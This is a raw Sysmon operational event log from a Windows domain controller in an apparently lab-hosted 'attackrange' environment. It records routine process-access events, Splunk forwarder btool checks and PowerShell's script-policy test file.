09:20:19.447{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001053716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.431{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.431{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001053714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.431{5EBD8912-8CD3-6151-4C00-00000000FD01}3152NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_w1bpzjxc.iap.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.431{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD3-6151-4E00-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.431{5EBD8912-8CD3-6151-4D00-00000000FD01}34123404C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD3-6151-4E00-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.438{5EBD8912-8CD3-6151-4E00-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD3-6151-4D00-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000001053710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.431{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD3-6151-4D00-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.416{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD3-6151-4D00-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.416{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD3-6151-4D00-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.421{5EBD8912-8CD3-6151-4D00-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001053706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.416{5EBD8912-8CD0-6151-2E00-00000000FD01}23842484C:\Windows\system32\DFSRs.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c1bd|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001053705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.369{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_w1bpzjxc.iap.ps12021-09-27 09:20:19.369 10341000x80000000000000001053704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.353{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD2-6151-4A00-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.338{5EBD8912-8CD2-6151-4A00-00000000FD01}40124016C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.290{5EBD8912-8CD3-6151-4B00-00000000FD01}40564084C:\Windows\system32\wbem\wmiprvse.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\combase.dll+ac312|C:\Windows\System32\combase.dll+acc3e|C:\Windows\System32\combase.dll+ac9ff|C:\Windows\System32\combase.dll+2f2c8|C:\Windows\System32\combase.dll+2eee0|C:\Windows\System32\combase.dll+3bf47|C:\Windows\System32\combase.dll+c2774|C:\Windows\System32\combase.dll+38f61|C:\Windows\System32\combase.dll+3a760|C:\Windows\System32\combase.dll+4dba|C:\Windows\System32\RPCRT4.dll+da374|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.132{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.097{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.096{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.096{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.096{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.096{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.095{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.095{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.095{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.095{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.095{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.094{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.094{5EBD8912-8CD2-6151-4300-00000000FD01}37603928C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 